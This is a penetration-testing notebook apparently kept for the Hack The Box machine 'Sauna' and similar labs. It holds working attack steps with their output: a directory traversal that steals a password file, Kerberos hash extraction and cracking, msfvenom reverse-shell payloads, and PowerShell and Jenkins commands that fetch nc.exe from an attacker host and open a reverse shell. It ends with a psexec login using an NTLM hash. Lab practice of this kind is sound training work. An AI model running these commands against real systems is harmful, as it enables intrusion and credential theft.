# HacktheBox

## Global Settings

In [11]:
# Single Box
nickname = "sauna"         # Name of the box
dnsName = "egotistical-bank.local"
aIP = '10.10.10.175'

# 2v2 Player Cyber Recon
#a2IP = ['10.10.110.101', '10.10.110.102']
#d2IP = ['10.10.110.103', '10.10.110.104']

# 4v4 Player Cyber Recon
#a4IP = ['10.10.110.101', '10.10.110.102', '10.10.110.103', '10.10.110.104']
#d4IP = ['10.10.110.105', '10.10.110.106', '10.10.110.107', '10.10.110.108']

# SSH Configuration
import paramiko
sshport = 22
username = "kali"
password = "kali"

# WinRM Configuration
winrmpass = winrmpassword = "Thestrokes23"

####
# Create the Output Directory for the Below Information Gathered
currentDir = "/home/kali/hackthebox"
outputDir = currentDir + "/output"
print("Output Directory:" + outputDir)
!mkdir -p $outputDir

# Create directories for the box
boxDir = outputDir + "/" + nickname
print("Box Directory:" + boxDir)
!mkdir -p $boxDir

Output Directory:/home/kali/hackthebox/output
Box Directory:/home/kali/hackthebox/output/sauna


<a id="index"></a>
## Index

[nmap Port Scan Quick](#nmap)

[nmap Discover Versions](#nmapsv)

[nmap all the ports](#nmapall)

[nmap scripts default and safe](#nmapscripts)

[nikto](#nikto)

[dirb](#dirb)

[smbclient](#smbclient)

[smbmount](#smbmount)

[curl (GET)](#curlget)

[Powershell Download](#powerget)

[john the ripper](#john)

[Create msfvenom payloads](#msfvenom)

[metasploit multi-handler](#multihandler)

[SSH Paramiko](#sshp)

[WinRM](#winrm)

[rpcinfo and showmount for NFS Shares](#rpcinfo)

[LDAP Search](#ldapsearch)

[Impacket - GetNPUsers](#getnpusers)

[Linux privesc](#linuxprivesc)

[Windows privesc](#windowsprivesc)

[Flask Debug Console](#flaskdebug)

[Jenkins Script Console](#jenkins)

<a id="nmap"></a>
## nmap 
Very quick scan to discover open ports

[Back to Index](#index)

Command: nmap -p- --min-rate=1000 -T4 --ipaddr-- -oN nmap

In [3]:
outputLocation = boxDir + '/nmap.txt'
!nmap -p- --min-rate=1000 -T4 $aIP -oN $outputLocation

Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-04 19:00 EST
Nmap scan report for active (10.10.10.175)
Host is up (0.086s latency).
Not shown: 65515 filtered ports
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49675/tcp open  unknown
49686/tcp open  unknown
65419/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 86.53 seconds


<a id="nmapsv"></a>
## nmap -sV 
Discovers the version of the services running if available

[Back to Index](#index)

Command: nmap -sV --ipaddr-- -oN nmapsv

In [5]:
outputLocation = boxDir + '/nmapsv.txt'
!nmap -Pn -sV $aIP -oN $outputLocation

Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-04 19:07 EST
Nmap scan report for active (10.10.10.175)
Host is up (0.10s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
80/tcp   open  http          Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-12-05 07:09:46Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version

<a id="nmapall"></a>
## nmap All TCP ports

[Back to Index](#index)

Command: nmap -sV -p- --ipaddr-- -oN nmap

In [ ]:
outputLocation = boxDir + '/nmapAll.txt'
!nmap -sV -p- $aIP -oN $outputLocation

<a id="nmapscripts"></a>
## nmap scripts default,safe

[Back to Index](#index)

Command: nmap -sV --scripts default,safe --ipaddr-- -oN nmapScripts

In [ ]:
outputLocationScripts = boxDir + '/nmapScripts.txt'
!nmap -Pn -sV --script default,safe $aIP -oN $outputLocationScripts

In [ ]:
# Gather the ports of the web servers present
results = !cat $outputLocation | grep "/tcp" 
webserverPortList = []
print("Possible web servers running:")
for r in results:
    if "/tcp" in r and "open" in r and "Apache" in r:
        print(r)

<a id="nikto"></a>
## nikto

[Back to Index](#index)

In [ ]:
### nikto settings
outputLocationNikto = boxDir + "/nikto.csv"
url="http://" + dnsName
!nikto -h $aIP -o $outputLocationNikto -p 80
#!nikto -h $url -o $outputLocationNikto

# Below is how to scan multiple ports
#!nikto -h $aIP -o $outputLocation -p 80,443  

<a id="dirb"></a>
## dirb

[Back to Index](#index)

In [ ]:
### dirb settings
outputLocationDirb = boxDir + "/dirb2.txt"
#url="http://" + dnsName
#url="http://" + aIP
url = "http://" + aIP + ":50000"
wordlist="/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt"
# -w does not stop on warning messages
#!dirb $url $wordlist -w -o $outputLocationDirb
!dirb $url -o $outputLocationDirb

<a id="smbclient"></a>
## smbclient

[Back to Index](#index)


In [ ]:
!smbclient -L $aIP -U anonymous --no-pass

<a id="smbmount"></a>
## smbmount

[Back to Index](#index)


In [ ]:
# smbmount /////--ipaddr or name--//share --folder--

<a id="curlget"></a>
## curl (GET)

[Back to Index](#index)

In [ ]:
# The following command is a directory traversal on CFIDE to get the administrator password
#curlURL = "http://" + aIP 
curlURL = "http://" + aIP + ":8500" + "/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en"
#!curl -X GET $curlURL
resultsCurl = !curl -X GET $curlURL
for line in resultsCurl:
    if "password" in line:
        print(line)

<a id="powerget"></a>
## Powershell (GET)

[Back to Index](#index)

Newer versions of powershell support the Invoke-Webrequest
````
$url = "http://10.10.14.3:8090/Chimichurri.exe"
$output = "c.exe"
Invoke-WebRequest -Uri $url -OutFile $output
````

With older versions of powershell you need to use .NET
````
$w = New-Object System.Net.WebClient
$url = "http://10.10.14.10:8090/file.exe"
$output = "output.exe"
$w.DownloadFile($url, $file)
````
The above options can be bundled into a ps1 file and executed.

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

<a id="john"></a>
## John the Ripper

[Back to Index](#index)

In [8]:
### Output Location
outputLocationJohn = boxDir + "/hash.txt"
saveFile = boxDir + "/john.output"
# Kerberos hashes from Impacket NPUsers does not load properly below, manually load to hash.txt
#hash='$krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL:c5fcbfe4f219b5dd5f8634bd4d67a9d0$99493b26fcd0da4d002167e6d3a55fdaf34ff7371eb335be2a5869f33b771351a1051ce3e8585a20ccbbd440a88ed7d7ba63dcbfc61fae67dc31331b106a2a84fbc299d8ff5f60b017b7b182d3712133d6cf31de66f5ee2ed572fdbbfd8c99330d4065e66438b1e6ba6322da2ddc15c23e234aa0fc82ed349e8a48e2525d1f766fddfd859386e2e333c4a7cdecae6a7a182b3113b05706038c94007f1016d9a69a1ed079ceef8377bce3cbde6b8967f9139b8038a5bc5981ce17101daa427959ca5ccbef9afa153af4743b8024052347be335bba1c986c26572ce935844f08ee34358a6f4d33ef5bb9495f350f99b863a69dd8fb18206f7c1d5a8100bae19ef7'
#!echo $hash > $outputLocationJohn
# Display the file with the hash in it
#!cat $outputLocationJohn

# Using Default John wordlist
#!/usr/sbin/john $outputLocationJohn > $saveFile

# Using Rockyou or a selected wordlist
!/usr/sbin/john -wordlist=/usr/share/wordlists/rockyou.txt $outputLocationJohn > $saveFile
!cat $saveFile

Using default input encoding: UTF-8
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1g 0:00:00:17 DONE (2020-12-05 11:07) 0.05636g/s 594067p/s 594067c/s 594067C/s Thing..Thereisnospoon
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Thestrokes23     ($krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL)


<a id="msfvenom"></a>
## msfvenom payload Creation

[Back to Index](#index)

Reference: https://redteamtutorials.com/2018/10/24/msfvenom-cheatsheet/

Create an executable that can be run as a windows service to start a bind shell
````
msfvenom -p windows/x64/meterpreter/bind_tcp lport=8090 -f exe-service
````

Schedule Task on Coldfusion 8
````
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.14 LPORT=8090 -f raw > cold.jsp
````

In [2]:
outputLocationPayload = boxDir + "/payload.jsp"
!msfvenom -p  java/jsp_shell_reverse_tcp LHOST=10.10.14.3 LPORT=8090 -f raw > $outputLocationPayload

Payload size: 1496 bytes


<a id="multihandler"></a>
## Metasploit Multi-Handler Setup

[Back to Index](#index)

Setup: Creates a multihandler file for a metasploit payload being executed or other payload that could connect back

In [ ]:
port=8090
outputLocationmhandler = boxDir + "/mhandler.rc"
f = open(outputLocationmhandler, 'w')
f.write("use exploit/multi/handler")
f.write("set payload windows/x64/meterpreter/bind_tcp")
f.write("set RHOSTS " + aIP)
f.write("set RPORT " + str(port))
f.close()

print("Execute to Start: msfconsole -r " + outputLocationmhandler)

<a id="sshp"></a>
## SSH Paramiko

### Creates a journal file that can be viewed

[Back to Index](#index)

In [ ]:
#commandList = ['uname -a']
commandList = ['uname -a', 'ps -aef --forest', 'netstat -anop']

# To investigate a process use the below...
processID = "1225"
pcmd = "ls -la /proc/" + processID + "/cwd"
pcmd2 = "ss -anp | grep " + processID
#commandList = [pcmd, pcmd2] 

ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(aIP, sshport, username, password)

# Record output in journal
outputLocationJournal = boxDir + "/journal.txt"
f = open(outputLocationJournal, 'a')
for c in commandList:
    stdin, stdout, stderr = ssh.exec_command(c)
    jlines = stdout.readlines()
    #print(jlines)
    print("\nCommand: " + c)
    print("Output")
    for j in jlines:
        print(j.strip())

    f.write("\n\nCommand: " + c)
    f.write("\nOutput\n")
    for jline in jlines:
        f.write(jline)
f.close()

### View Journal

In [ ]:
!cat $outputLocationJournal

### Roll Journal  (Warning clears Journal)

In [ ]:
outputLocationArchive = boxDir + "/journal_archive.txt"
!touch $outputLocationArchive
!cat $outputLocationArchive $outputLocationJournal > $outputLocationArchive
!rm $outputLocationJournal

<a id="winrm"></a>
## Windows Remote Management WinRM

[Back to Index](#index)

In [31]:
# Settings 
winrmusername = "fsmith"
winrmpassword = "Thestrokes23"

#poshCommand = "Get-Location"
#poshCommand = "whoami; whoami /groups; whoami /priv"

# Download a file
# Sharphound Locations: https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors

# Takes a while for the command to complete based on the size of the file
poshCommand = "Invoke-WebRequest -Uri http://10.10.14.10:8090/SharpHound.ps1 -Outfile SharpHound.ps1"
# Step 2 of Sharphound
poshCommand2 = "Import-Module .\SharpHound.ps1"
# Step 3 of Sharphound
poshCommand3 = "Invoke-BloodHound -CollectionMethod All"
# Step 4 is to Copy the file from a remote session...
#Copy-Item -Path c:\users\svc-alfresco\Documents\20201030201503_BloodHound.zip -Destination . -FromSession $s

# Gather users flag on hackthebox
#poshCommand = "Get-Content -Path c:\\users\\" + winrmusername + "\\Desktop\\user.txt"

scriptPath = boxDir + "/ps.ps1"
f = open(scriptPath, "w")
f.write("#!/usr/bin/pwsh\n")
f.write("$pw = Convertto-Securestring -AsPlainText -Force -String \"" + winrmpassword + "\"\n")
f.write("$cred = new-object -typename System.Management.Automation.PSCredential -argumentlist \"" + winrmusername + "\",$pw" + "\n")
f.write("$s = New-PSSession -Computername " + aIP + " -Authentication Negotiate -Credential $cred\n")
f.write("Invoke-Command -Session $s {" + poshCommand + "}\n")
f.write("Invoke-Command -Session $s {" + poshCommand2 + "}\n")
f.write("Invoke-Command -Session $s {" + poshCommand3 + "}\n")
f.close()

!chmod 700 $scriptPath
!$scriptPath

print("Completed Commands!")

=                                                                                                                                                                                                                                                                                                                                                                                                                 Writing web request                                                                Writing request stream... (Number of bytes written: 10000)                                                                                                                                                                                                                                                                                                                                                                                                                                  

<a id="rpcinfo"></a>
## rpcinfo and showmount for NFS shares

[Back to Index](#index)

````
rpcinfo -p --ipaddr--
showmount -e --ipaddr--
mount --ipaddr--:--directoryshared-- /mountpoint
````

<a id="ldapsearch"></a>
## ldapsearch

[Back to Index](#index)

ldapsearch -h 10.10.10.161 -p 389 -x -b "dc=htb,dc=local"

** This is only allowed if you do not have to authenticate to the domain

?? What do you do when you have to authenticate to the domain? How does the command change?

In [9]:
outputLocationLDAP = boxDir + "/ldapsearch.txt"
domain="dc=egotistical-bank,dc=local"
!ldapsearch -h $aIP -p 389 -x -b $domain > $outputLocationLDAP
!cat $outputLocationLDAP

# extended LDIF
#
# LDAPv3
# base <dc=egotistical-bank,dc=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# EGOTISTICAL-BANK.LOCAL
dn: DC=EGOTISTICAL-BANK,DC=LOCAL
objectClass: top
objectClass: domain
objectClass: domainDNS
distinguishedName: DC=EGOTISTICAL-BANK,DC=LOCAL
instanceType: 5
whenCreated: 20200123054425.0Z
whenChanged: 20201205065832.0Z
subRefs: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
subRefs: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
subRefs: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
uSNCreated: 4099
dSASignature:: AQAAACgAAAAAAAAAAAAAAAAAAAAAAAAAQL7gs8Yl7ESyuZ/4XESy7A==
uSNChanged: 57366
name: EGOTISTICAL-BANK
objectGUID:: 7AZOUMEioUOTwM9IB/gzYw==
replUpToDateVector:: AgAAAAAAAAADAAAAAAAAAKuM73jRSYVEssLtnGX+r60M4AAAAAAAAJfA2
 xUDAAAA/VqFkkbeXkGqVm5qQCP2DAvQAAAAAAAA0PAKFQMAAABAvuCzxiXsRLK5n/hcRLLsCbAAAA
 AAAADUBFIUAwAAAA==
creationTime: 132516251123435384
forceLogoff: -9223372036854775808
lockoutDuration: -18000000000
lockOutObservat

### Generate List of Sam Accounts
Parse the LDAP Information for a list of Sam Accounts

Modify after the output occurs to remove unnecessary groups, etc.

Note: This may not return some accounts like service accounts In hackthebox the machine Forest, it does not return svc-alfresco.

In [7]:
outputLDAPUserList= boxDir + "/userLDAP.txt"
!cat $outputLocationLDAP | grep -e sAMAccountName > $outputLDAPUserList
!sed -i 's/sAMAccountName:\s//' $outputLDAPUserList

<a id="getnpusers"></a>
## Impacket - GetNPUsers

[Back to Index](#index)

If Kerberos Pre-Authentication is Disabled a hash will be returned.  A user account list can be passed to check this...

Here is some powershell to check if you have privileges: 
````
get-aduser -filter * -properties DoesNotRequirePreAuth | where {$._DoesNotRequirePreAuth -eq "True" -and $_.Enabled -eq "True"} | select Name
````

The location of impacket may vary!

In [6]:
!locate GetNPUsers

/home/kali/.local/bin/GetNPUsers.py
/home/kali/.local/bin/__pycache__/GetNPUsers.cpython-38.pyc
/usr/share/doc/python3-impacket/examples/GetNPUsers.py


In [ ]:
# Install impacket if this is the first time running GetNPUsers
!pip install impacket

# pyasn1 may not be installed also
!pip install pyasn1

#### Location of GetNPUsers
Set the location of the script below

##### You need to generate a users.txt file to use in the enumeration

In [3]:
locationGetNPUsers="/usr/share/doc/python3-impacket/examples/GetNPUsers.py"
outputUsersTXT= boxDir + "/users.txt"
# Make sure the domain is updated in the global settings
domain = dnsName + "/"
# After creating users.txt file - verify it exists
!cat $outputUsersTXT

fsmith


In [4]:
locationNPUsers= boxDir + "/npusers.txt"
# Modified the below command to use python3
!python3 $locationGetNPUsers -dc-ip $aIP $domain -usersfile $outputUsersTXT -format john > $locationNPUsers
!cat $locationNPUsers

/usr/share/doc/python3-impacket/examples/GetNPUsers.py:413: SyntaxWarning: "is" with a literal. Did you mean "=="?
  if domain is '':
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

$krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL:c5fcbfe4f219b5dd5f8634bd4d67a9d0$99493b26fcd0da4d002167e6d3a55fdaf34ff7371eb335be2a5869f33b771351a1051ce3e8585a20ccbbd440a88ed7d7ba63dcbfc61fae67dc31331b106a2a84fbc299d8ff5f60b017b7b182d3712133d6cf31de66f5ee2ed572fdbbfd8c99330d4065e66438b1e6ba6322da2ddc15c23e234aa0fc82ed349e8a48e2525d1f766fddfd859386e2e333c4a7cdecae6a7a182b3113b05706038c94007f1016d9a69a1ed079ceef8377bce3cbde6b8967f9139b8038a5bc5981ce17101daa427959ca5ccbef9afa153af4743b8024052347be335bba1c986c26572ce935844f08ee34358a6f4d33ef5bb9495f350f99b863a69dd8fb18206f7c1d5a8100bae19ef7


<a id="getadusers"></a>
## Impacket - GetADUsers

[Back to Index](#index)

In [10]:
locationGetADUsers="/usr/share/doc/python3-impacket/examples/GetADUsers.py"
saveADUsers= boxDir + "/ADusers.txt"
domain = dnsName + "/"
!python3 $locationGetADUsers $domain -dc-ip $aIP


/usr/share/doc/python3-impacket/examples/GetADUsers.py:229: SyntaxWarning: "is" with a literal. Did you mean "=="?
  if domain is '':
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Querying 10.10.10.175 for information about domain.
Name                  Email                           PasswordLastSet      LastLogon           
--------------------  ------------------------------  -------------------  -------------------


<a id="linuxprivesc"></a>
## Linux privesc

[Back to Index](#index)

LinEnum - https://github.com/rebootuser/LinEnum

LinPeas - https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh

<a id="windowsprivesc"></a>
## Windows privesc

[Back to Index](#index)

Windows Exploit Suggester
````
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
Download to your pentest box
# Download from Microsoft a list of the updates to check against
./windows-exploit-suggester.py --update
Downloaded the following file: 2020-12-02-mssb.xls
On the windows computer execute systeminfo and copy into systeminfo.txt on pentest box
# Upgrade xlrd to read the xls file
pip install xlrd --upgrade
./windows-exploit-suggester.py --database 2020-12-02-mssb.xls --systeminfo systeminfo.txt
````

References: https://github.com/egre55/windows-kernel-exploits

In [ ]:
# Download Windows-Exploit-Suggester Updated


<a id="flaskdebug"></a>
## Flask Debug Console

[Back to Index](#index)

````
import subprocess
p = subprocess.check_output('whoami', shell=True)
print(p.decode('utf-8'))
````

<a id="jenkins"></a>
## Jenkins Console

[Back to Index](#index)

````
Try and find the scripts console http://:5000/<page>/script

In the console you can execute commands with the following...

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'cmd.exe /c dir'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
````

Reference: https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password

For powershell download a file locally to execute
````
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'cmd.exe /c echo $wc=New-Object System.Net.WebClient;$url="http://10.10.14.18:8090/nc.exe";$file="o.exe";$wc.DownloadFile($url,$file) > s.ps1'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

````

Verify the file written
````
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'cmd.exe /c type s.ps1'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
````

Execute the powershell file to download the nc.exe rename to o.exe
````
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'cmd.exe /c powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File s.ps1'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
````

Execute o.exe for the reverse shell 
````
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'cmd.exe /c o.exe 10.10.14.18 8090 -e cmd.exe'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
````

## metasploit psexec

````
msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set rhost 10.10.10.63
rhost => 10.10.10.63
msf5 exploit(windows/smb/psexec) > set rport 445
rport => 445
msf5 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                10.10.10.63      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass                                no        The password for the specified username
   SMBUser                                no        The username to authenticate as


Exploit target:

   Id  Name
   --  ----
   0   Automatic
````

msf5 exploit(windows/smb/psexec) > set smbuser administrator
smbuser => administrator
msf5 exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
smbpass => aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
msf5 exploit(windows/smb/psexec) > exploit
